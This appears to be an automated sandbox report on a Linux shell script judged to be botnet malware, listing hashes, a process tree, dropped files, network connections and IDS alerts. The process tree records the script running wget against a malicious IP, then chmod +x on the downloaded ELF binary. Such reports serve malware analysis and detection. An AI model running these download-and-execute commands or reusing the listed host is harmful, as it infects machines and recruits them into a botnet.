| File name: | _c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh |
| Full analysis: | https://app.any.run/tasks/fac96a36-0f6b-414a-9675-7830144f1b2a |
| Verdict: | Malicious activity |
| Threats: | A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. |
| Analysis date: | May 24, 2026, 00:28:13 |
| OS: | Ubuntu 22.04.2 |
| Tags: | |
| Indicators: | |
| MIME: | text/x-shellscript |
| File info: | POSIX shell script, ASCII text executable |
| MD5: | 9CEE945FD48295DA4CA0810FC1900E49 |
| SHA1: | FC3445FA2DF83774DAB571DDCA5E8C4A100289D1 |
| SHA256: | C85D12D6427041849CE0C973E8639A4E2BFC23CDD0FEB564D29CDE873367446D |
| SSDEEP: | 6:hTBGjs8kndaVqDlHt/2HAulNXYq4HvXDG+NjVsNXYrkJ:VQjqn2qDlHV0Piq4HvXDGmKi2 |
| .sh | | | Linux/UNIX shell script (100) |
|---|
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1863 | /bin/sh -c "sudo chown user /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d\.sh && chmod +x /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d\.sh " | /usr/bin/dash | — | N00yyFAAJQjQ6JFp | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1864 | sudo chown user /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1865 | chown user /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh | /usr/bin/chown | — | sudo | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1866 | chmod +x /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh | /usr/bin/chmod | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1867 | sudo -iu user /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh | /usr/bin/sudo | — | dash | |||||||||||
User: root Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1868 | /bin/sh /home/user/Desktop/_c85d12d6427041849ce0c973e8639a4e2bfc23cdd0feb564d29cde873367446d.sh | /usr/bin/dash | — | sudo | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1869 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1870 | rm GOQV | /usr/bin/rm | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 256 Modules
| |||||||||||||||
| 1871 | wget http://202.155.8.56/GOQV | /usr/bin/wget | dash | ||||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
| 1872 | chmod +x GOQV | /usr/bin/chmod | — | dash | |||||||||||
User: user Integrity Level: UNKNOWN Exit code: 0 Modules
| |||||||||||||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 1871 | wget | /tmp/GOQV | binary | |
MD5:— | SHA256:— | |||
| 1876 | wget | /tmp/YVGF | binary | |
MD5:— | SHA256:— | |||
| 1881 | wget | /tmp/MYUP | binary | |
MD5:— | SHA256:— | |||
| 1884 | MYUP | /tmp/.zwxGXIla | binary | |
MD5:— | SHA256:— | |||
| 1895 | TSJR | /tmp/.zwxGXIla | binary | |
MD5:— | SHA256:— | |||
| 1886 | wget | /tmp/IMTZ | binary | |
MD5:— | SHA256:— | |||
| 1892 | wget | /tmp/TSJR | binary | |
MD5:— | SHA256:— | |||
| 1897 | wget | /tmp/SIZV | binary | |
MD5:— | SHA256:— | |||
| 1902 | wget | /tmp/ATVR | binary | |
MD5:— | SHA256:— | |||
| 1907 | wget | /tmp/LKMS | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | — | 185.125.190.101:80 | http://connectivity-check.ubuntu.com/ | GB | — | — | whitelisted |
— | — | GET | — | 185.125.190.100:80 | http://connectivity-check.ubuntu.com/ | GB | — | — | whitelisted |
1876 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/YVGF | US | binary | 200 Kb | unknown |
1886 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/IMTZ | US | binary | 129 Kb | unknown |
1897 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/SIZV | US | binary | 105 Kb | unknown |
1892 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/TSJR | US | binary | 105 Kb | unknown |
1902 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/ATVR | US | binary | 154 Kb | unknown |
1907 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/LKMS | US | binary | 129 Kb | unknown |
1913 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/ANFG | US | binary | 86.0 Kb | unknown |
1918 | wget | GET | 200 | 202.155.8.56:80 | http://202.155.8.56/NKBO | US | binary | 125 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 185.125.190.101:80 | connectivity-check.ubuntu.com | CANONICAL-AS | GB | whitelisted |
452 | avahi-daemon | 224.0.0.251:5353 | — | — | — | whitelisted |
— | — | 185.125.190.100:80 | connectivity-check.ubuntu.com | CANONICAL-AS | GB | whitelisted |
1871 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1876 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1881 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1886 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1892 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1897 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
1902 | wget | 202.155.8.56:80 | — | AS-ULTAHOST | US | unknown |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
14.100.168.192.in-addr.arpa |
| whitelisted |
interocapify.biz |
| unknown |
unovizaship.net |
| unknown |
ntp.ubuntu.com |
| whitelisted |
unibokosion.cc |
| unknown |
imodobeness.at |
| unknown |
iruledolical.org |
| unknown |
transomemodom.info |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1871 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1876 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1881 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1886 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1892 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1897 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1902 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1907 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1913 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
1918 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |